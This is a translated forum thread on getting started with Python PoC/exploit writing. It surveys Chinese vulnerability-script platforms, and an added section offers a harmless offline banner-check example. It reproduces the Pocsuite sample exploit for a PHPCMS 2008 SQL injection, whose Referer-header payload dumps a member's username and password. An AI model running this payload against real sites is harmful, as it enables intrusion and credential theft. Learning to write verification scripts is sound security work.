How to get started with writing Poc/Exp Based on Python?

Source: Internet
Author: User
I have read some public PoCs before, and they are a bit confusing. Are there any tutorials? A simple example to demonstrate the process would help. Also, how do you write a PoC/Exp in combination with a PoC framework?

Reply content:

Zookeeper: I am relieved to see that everyone is promoting their own platforms.

The concept of a community-based vulnerability verification script platform probably comes first from the Metasploit community. Security researchers voluntarily write standardized vulnerability verification scripts or attack scripts using the official framework and publish them to an aggregation point; because the framework mandates a code specification, various products can easily call the large number of verification/attack scripts written by the "community" for scanning, attack, verification and other purposes.

Propaganda aside, I will analyze the current situation of such platforms and think about their future. In the past two years a large number of "community-based" PoC platforms have emerged in China; it is equally predictable that in the next two years some of these services will be closed or new platforms will appear.

Partial list (summaries excerpted from each site's description and title):
  • http://www.beebeeto.com/: Beebeeto is a standardized POC/EXP platform jointly maintained by many security researchers.
  • https://www.bugscan.net/: The first community-based scanner.
  • http://vul.jdsec.com/: The "poor odd" vulnerability library is an information collection platform launched by the Network Knife security team for archiving vulnerability information.
  • https://www.sebug.net/: Sebug is an authoritative vulnerability reference, sharing and learning platform. It is the earliest and most authoritative vulnerability library in China.
  • http://tangscan.com/: Tang Dynasty Security Cruise (TangScan) is an enterprise online security platform maintained by many security researchers in the community; enterprises can perform security vulnerability detection and monitoring on their networks in TangScan to discover important security problems hidden in the network.
  • http://.....

The current frameworks are constraining, not comfortable
One year before Beebeeto went live, I thought through as many details as I could (from the perspective of users, writers and managers) about community vulnerability verification scripts: vulnerability exposure -> code writing -> script management -> script exploitation -> ... Facing that process, we promoted the BBS community and launched a framework that forces writers to fill in standardized vulnerability-related fields and the corresponding function bodies, so as to facilitate future (Beehive) scanners. After that, many community-based vulnerability scanning platforms emerged in the security industry. When I began to use and write our own framework scripts from the user's perspective, I realized that the current framework is not comfortable. It forces me to fill in every field, and for each field I have to consult the official documentation or demo code to see what belongs there. For example, for VulType in Beebeeto the author has to look up the vulnerability type in the official documentation and fill in the corresponding English version, and the same goes for the vulnerability description and other fields. In fact these fields can be simplified; perhaps only one Referer is really required.

Let's just talk about what @Neargle mentioned:
"Therefore, less than 10 lines of code are actually functional."

This sentence is very valuable for thinking. For example:
  • How to learn from the PoC & Exploit process;
  • How to make writing as fast and convenient as possible for someone who codes vulnerability scripts over the long term;
  • Whether the code can help the writer fill in the Vulnerability_info fields;
  • Quick verification, quick writing and quick detection of the vulnerabilities to be written;
  • Among the large number of existing vulnerability verification scripts, how can we accurately and quickly check the probability of duplication;
  • ...

There are more problems that need to be solved. (Omitted three hundred words)

How to get started
These platforms are working hard to make it easy to write verification/attack scripts, and they teach a lot of writing methods. At a minimum, developers need coding skills in the corresponding language and, secondly, some knowledge of vulnerability principles; that is about it. Read more and write more. This is a process that requires accumulated experience. If you have not learned it, think about your own problems first and then check whether the platform/framework is too poor. Finally, it is important to select a suitable platform.

Future possibilities. Foreseeable steps:
  1. Vulnerability outbreak
  2. Details Publishing
  3. Script release
  4. Product Support
  5. Benefits
  6. ...

Well, now I have to tell myself that users are not only lazy but also stupid. Look at http://sebug.net: the navigation help shows the detailed procedure for the Pocsuite framework, for your reference. Recently this exp platform is also being written. Interfaces and frameworks are always troublesome.

What @Evi1m0 says makes sense. There may be more than 10 lines of code that really work; however, to handle interfaces and other details you need to write a lot of redundant code.

To write such an exp you don't need much programming knowledge; you just need to understand the principle of the vulnerability, plus some basic syntax and the corresponding libraries.

We feel that this kind of platform is a trend, and automated penetration can remove a lot of tedious steps. This is not an advertisement; I wrote it for myself. Who knows. The three giants have shown up above; who else is there? Front-row ad space. The two above helped publicize their own projects, and I have helped publicize theirs as well.

WooYun's TangScan has detailed help documentation for writing PoCs; you not only learn Python but also become familiar, in the process, with the causes and exploitation methods of some common vulnerabilities. The official site is http://tangscan.com.

WooYun also has a good reward scheme, which pays out on a monthly basis. For example, if you submit dozens of PoCs at once, you can wait for Beebeeto every month even if you do not submit any more for years.

Now let me give my own view:
In fact, whether it is WooYun's TangScan, Zhidao Chuangyu's Pocsuite or Beebeeto (I have not written for Bugscan, so I am not particularly familiar with it), web PoCs and Exps all depend heavily on two Python libraries:
1. requests: simulates interactions such as web requests and responses.
2. re: regular expressions used to verify whether the returned result meets the vulnerability's expectation, i.e. whether the vulnerability exists.

Most of the remaining code is vulnerability information.
Take Pocsuite and TangScan as examples. Example from the official Pocsuite documentation:

#!/usr/bin/env python
# coding: utf-8
import re
import urlparse

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    # Vulnerability information fields required by the framework
    vulID = '000000'  # ssvid
    version = '1'
    author = ['Medici.yan']
    vulDate = '2017-11-21'
    createDate = '2017-09-23'
    updateDate = '2017-09-23'
    references = ['http://www.sebug.net/vuldb/ssvid-62274']
    name = '_62274_phpcms_2008_place_sql_inj_PoC'
    appPowerLink = 'http://www.phpcms.cn'
    appName = 'phpcms'
    appVersion = '000000'
    vulType = 'SQL Injection'
    desc = '''
    The advertisement module of PHPCMS 2008 filters its parameters laxly,
    leading to SQL injection. If error display is enabled on the target
    server it can be used directly; if error display is disabled, a
    time-based or error-based blind injection can be used.
    '''
    samples = ['http://10.1.200.28/']

    def _attack(self):
        result = {}
        vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
        # Error-based injection payload carried in the Referer header
        payload = ("1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),"
                   "(SELECT concat(char(45,45),username,char(45,45),password,char(45,45)) "
                   "from phpcms_member limit 1)) a from information_schema.tables "
                   "group by a) b),'0')#")
        head = {'Referer': payload}
        resp = req.get(vulurl, headers=head)
        if resp.status_code == 200:
            # Match the MySQL duplicate-entry error the payload triggers
            # (regex reconstructed from the garbled page text)
            match_result = re.search(r"Duplicate entry '1--(.+)--(.+)--' for key",
                                     resp.content, re.I | re.M)
            if match_result:
                result['AdminInfo'] = {}
                result['AdminInfo']['Username'] = match_result.group(1)
                result['AdminInfo']['Password'] = match_result.group(2)
        return self.parse_attack(result)

    def _verify(self):
        result = {}
        vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
        # Verification variant: inject md5(1) and look for its digest in the response
        payload = ("1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),md5(1)) a "
                   "from information_schema.tables group by a) b),'0')#")
        head = {'Referer': payload}
        resp = req.get(vulurl, headers=head)
        if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = payload
        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
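To make the "requests plus re, and the rest is metadata" structure concrete without depending on any of the platforms above, here is an added example in Python 3 that is not taken from the page or from Pocsuite, TangScan or Beebeeto. It mirrors the framework shape (metadata fields on top, a short `_verify` doing the real work) but only fingerprints a product version from a `<meta name="generator">` tag, which is the kind of check a defender runs against their own hosts. The class name `GeneratorBannerPoC`, the `http_fetch`/`offline_fetch` helpers, the `.invalid` hostnames, the `ExampleCMS` version strings and the `PLACEHOLDER-0000` id are all constructed for this example; the fetcher is injectable so the whole thing runs offline against constructed responses.

```python
import re
from urllib.parse import urljoin
from urllib.request import urlopen


def http_fetch(url, timeout=10):
    """Default fetcher: GET url and return (status_code, body_text).
    Assumed helper standing in for a framework request wrapper such as requests.get."""
    with urlopen(url, timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


class GeneratorBannerPoC:
    """Framework-style PoC: metadata up top, a short _verify doing the real work."""
    # Metadata fields in the style the platforms above require (all placeholders).
    vulID = "PLACEHOLDER-0000"
    name = "example_generator_banner_check"
    vulType = "Information Disclosure"
    desc = "Reports pages whose <meta name=generator> tag announces a version on the watch list."
    samples = ["http://example.invalid/"]  # constructed sample target

    # The regular expression decides whether the response 'meets expectations'.
    GENERATOR_RE = re.compile(
        r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']+)["\']', re.I)
    WATCHED_PREFIXES = ("ExampleCMS 1.0",)  # constructed product/version prefixes

    def __init__(self, url, fetch=http_fetch):
        self.url = url
        self.fetch = fetch  # injectable so the check can run offline in tests

    def _verify(self):
        """The functional core: one request, one regex, one result dict."""
        target = urljoin(self.url, "/index.php")
        status, body = self.fetch(target)
        result = {}
        if status != 200:
            return result
        match = self.GENERATOR_RE.search(body)
        if match and match.group(1).startswith(self.WATCHED_PREFIXES):
            result["VerifyInfo"] = {"URL": target, "Banner": match.group(1)}
        return result


# Constructed responses keyed by URL, so the PoC can be exercised without a network.
CONSTRUCTED_SITES = {
    "http://vulnerable.invalid/index.php": (
        200, '<html><head><meta name="generator" content="ExampleCMS 1.0.3"></head></html>'),
    "http://patched.invalid/index.php": (
        200, '<html><head><meta name="generator" content="ExampleCMS 2.1"></head></html>'),
    "http://down.invalid/index.php": (503, "Service Unavailable"),
}


def offline_fetch(url):
    """Fetcher that serves the constructed responses instead of going on the network."""
    return CONSTRUCTED_SITES.get(url, (404, "Not Found"))


def run_offline():
    """Run the PoC against each constructed site; returns {base_url: result dict}."""
    bases = ("http://vulnerable.invalid/", "http://patched.invalid/", "http://down.invalid/")
    return {base: GeneratorBannerPoC(base, fetch=offline_fetch)._verify() for base in bases}


if __name__ == "__main__":
    for base, result in run_offline().items():
        print(base, "->", result or "not matched")
```

Everything framework-specific here is the metadata block; the check itself is the handful of lines in `_verify`, which is the point @Neargle's remark about "less than 10 lines" makes. Passing the fetcher in rather than calling `requests` directly is what lets the same script be verified against canned responses before it is ever pointed at a live host.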
Welcome to Bugscan.
Welcome to Bugscan.
Welcome to Bugscan.
Important things are said three times.
http://www.bugscan.net
Join the Bugscan community and use the Bugscan tool.
All plug-ins are completely open within the community, and learning to write PoCs is meaningless.
Hope to make progress together with you.
